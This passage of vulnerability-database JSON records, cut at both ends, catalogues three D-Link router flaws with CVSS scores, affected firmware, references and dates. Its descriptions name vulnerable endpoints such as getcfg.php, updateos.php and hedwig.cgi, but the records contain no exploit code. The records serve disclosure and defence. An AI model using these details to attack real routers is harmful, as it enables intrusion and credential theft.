"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dar-8000_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "20151231",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dar-8000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5144"
}
]
},
"cve": "CVE-2023-5144",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "cna@vuldb.com",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@vuldb.com",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "cna@vuldb.com",
"id": "CVE-2023-5144",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2023-5144",
"trust": 1.0,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5144"
},
{
"db": "NVD",
"id": "CVE-2023-5144"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DAR-7000 and DAR-8000 up to 20151231. Affected is an unknown function of the file /sysmanage/updateos.php. The manipulation of the argument file_upload leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240240. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5144"
},
{
"db": "VULMON",
"id": "CVE-2023-5144"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "VULDB",
"id": "240240",
"trust": 1.1
},
{
"db": "DLINK",
"id": "SAP10354",
"trust": 1.1
},
{
"db": "NVD",
"id": "CVE-2023-5144",
"trust": 1.1
},
{
"db": "VULMON",
"id": "CVE-2023-5144",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-5144"
},
{
"db": "NVD",
"id": "CVE-2023-5144"
}
]
},
"id": "VAR-202309-0932",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-06-05T23:11:00.930000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-434",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5144"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.1,
"url": "https://vuldb.com/?id.240240"
},
{
"trust": 1.1,
"url": "https://vuldb.com/?ctiid.240240"
},
{
"trust": 1.1,
"url": "https://github.com/llixixi/cve/blob/main/d-link-dar-7000_upload_%20changelogo.md"
},
{
"trust": 1.1,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10354"
},
{
"trust": 1.1,
"url": "https://github.com/llixixi/cve/blob/main/d-link-dar-8000-10_upload_%20updateos.md"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/434.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-5144"
},
{
"db": "NVD",
"id": "CVE-2023-5144"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2023-5144"
},
{
"db": "NVD",
"id": "CVE-2023-5144"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-09-24T00:00:00",
"db": "VULMON",
"id": "CVE-2023-5144"
},
{
"date": "2023-09-24T23:15:10.587000",
"db": "NVD",
"id": "CVE-2023-5144"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-09-25T00:00:00",
"db": "VULMON",
"id": "CVE-2023-5144"
},
{
"date": "2024-06-04T19:18:09.637000",
"db": "NVD",
"id": "CVE-2023-5144"
}
]
}
}
VAR-202109-1682
Vulnerability from variot - Updated: 2024-06-02 22:59
An information disclosure issue exists in D-LINK-DIR-605 B2 Firmware Version: 2.01MT. An attacker can obtain a user name and password by forging a POST request to the / getcfg.php page. An incorrect authentication vulnerability exists in the D-LINK-DIR-605 firmware. Information may be obtained. D-Link DIR-605L is the first cloud router launched by D-Link, with a transmission speed of 300Mbps.
D-Link DIR-605L has an information disclosure vulnerability
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-1682",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-605l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "2.01mt"
},
{
"model": "dir-605l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dir-605l firmware 2.01mt"
},
{
"model": "dir-605l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-605l b2 2.01mt",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94835"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"db": "NVD",
"id": "CVE-2021-40655"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-605l_firmware:2.01mt:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-605l:b2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-40655"
}
]
},
"cve": "CVE-2021-40655",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2021-40655",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2021-94835",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-40655",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-40655",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2021-94835",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202109-1689",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-40655",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94835"
},
{
"db": "VULMON",
"id": "CVE-2021-40655"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1689"
},
{
"db": "NVD",
"id": "CVE-2021-40655"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An information disclosure issue exists in D-LINK-DIR-605 B2 Firmware Version : 2.01MT. An attacker can obtain a user name and password by forging a post request to the / getcfg.php page. D-LINK-DIR-605 An incorrect authentication vulnerability exists in firmware. Information may be obtained. D-Link DIR-605L is the first cloud router launched by D-link, with a transmission speed of 300Mbps. \n\r\n\r\nD-Link DIR-605L has an information disclosure vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-40655"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"db": "CNVD",
"id": "CNVD-2021-94835"
},
{
"db": "VULMON",
"id": "CVE-2021-40655"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-40655",
"trust": 3.9
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012445",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-94835",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1689",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-40655",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94835"
},
{
"db": "VULMON",
"id": "CVE-2021-40655"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1689"
},
{
"db": "NVD",
"id": "CVE-2021-40655"
}
]
},
"id": "VAR-202109-1682",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94835"
}
],
"trust": 1.3767857000000001
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94835"
}
]
},
"last_update_date": "2024-06-02T22:59:43.800000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security\u00a0Bulletin",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Patch for D-Link DIR-605L Information Disclosure Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/302906"
},
{
"title": "D-link Dir-605 B2 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=164769"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94835"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1689"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-863",
"trust": 1.0
},
{
"problemtype": "Illegal authentication (CWE-863) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"db": "NVD",
"id": "CVE-2021-40655"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://github.com/ilovewomen/d-link-dir-605/"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-40655"
},
{
"trust": 1.7,
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"trust": 0.8,
"url": "https://cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/522.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94835"
},
{
"db": "VULMON",
"id": "CVE-2021-40655"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1689"
},
{
"db": "NVD",
"id": "CVE-2021-40655"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-94835"
},
{
"db": "VULMON",
"id": "CVE-2021-40655"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1689"
},
{
"db": "NVD",
"id": "CVE-2021-40655"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-12-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-94835"
},
{
"date": "2021-09-24T00:00:00",
"db": "VULMON",
"id": "CVE-2021-40655"
},
{
"date": "2022-08-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"date": "2021-09-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202109-1689"
},
{
"date": "2021-09-24T21:15:07.310000",
"db": "NVD",
"id": "CVE-2021-40655"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-12-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-94835"
},
{
"date": "2021-09-30T00:00:00",
"db": "VULMON",
"id": "CVE-2021-40655"
},
{
"date": "2024-05-31T06:45:00",
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"date": "2022-07-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202109-1689"
},
{
"date": "2024-05-18T01:00:01.417000",
"db": "NVD",
"id": "CVE-2021-40655"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202109-1689"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-LINK-DIR-605\u00a0 Fraudulent Authentication Vulnerability in Firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-012445"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202109-1689"
}
],
"trust": 0.6
}
}
VAR-201501-0347
Vulnerability from variot - Updated: 2024-06-02 22:46
Multiple cross-site request forgery (CSRF) vulnerabilities in D-Link DIR-600 router (rev. Bx) with firmware before 2.17b02 allow remote attackers to hijack the authentication of administrators for requests that (1) create an administrator account or (2) enable remote management via a crafted configuration module to hedwig.cgi, (3) activate new configuration settings via a SETCFG,SAVE,ACTIVATE action to pigwidgeon.cgi, or (4) send a ping via a ping action to diagnostic.php. On the D-Link DIR-600 router (rev. Bx), remote administration can be enabled via a crafted configuration module sent to hedwig.cgi. The D-Link DIR-600 is a wireless routing device. Because the program allows users to perform certain operations through unauthenticated HTTP requests, an attacker can exploit the vulnerability to modify the configuration when a logged-in administrative user accesses a specially crafted web page. Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. D-Link DIR-600 is a SOHO wireless router product of D-Link.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201501-0347",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-600",
"scope": null,
"trust": 1.4,
"vendor": "d link",
"version": null
},
{
"model": "dir-600",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dir-600",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2.16ww"
},
{
"model": "dir-600",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-600",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "firmware 2.17b02"
},
{
"model": "dir-600",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "2.16ww"
},
{
"model": "dir-600 2.16ww",
"scope": null,
"trust": 0.3,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01581"
},
{
"db": "BID",
"id": "66092"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-571"
},
{
"db": "NVD",
"id": "CVE-2014-100005"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-600_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "2.16ww",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-600:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-100005"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dawid Czagan",
"sources": [
{
"db": "BID",
"id": "66092"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-571"
}
],
"trust": 0.9
},
"cve": "CVE-2014-100005",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2014-100005",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
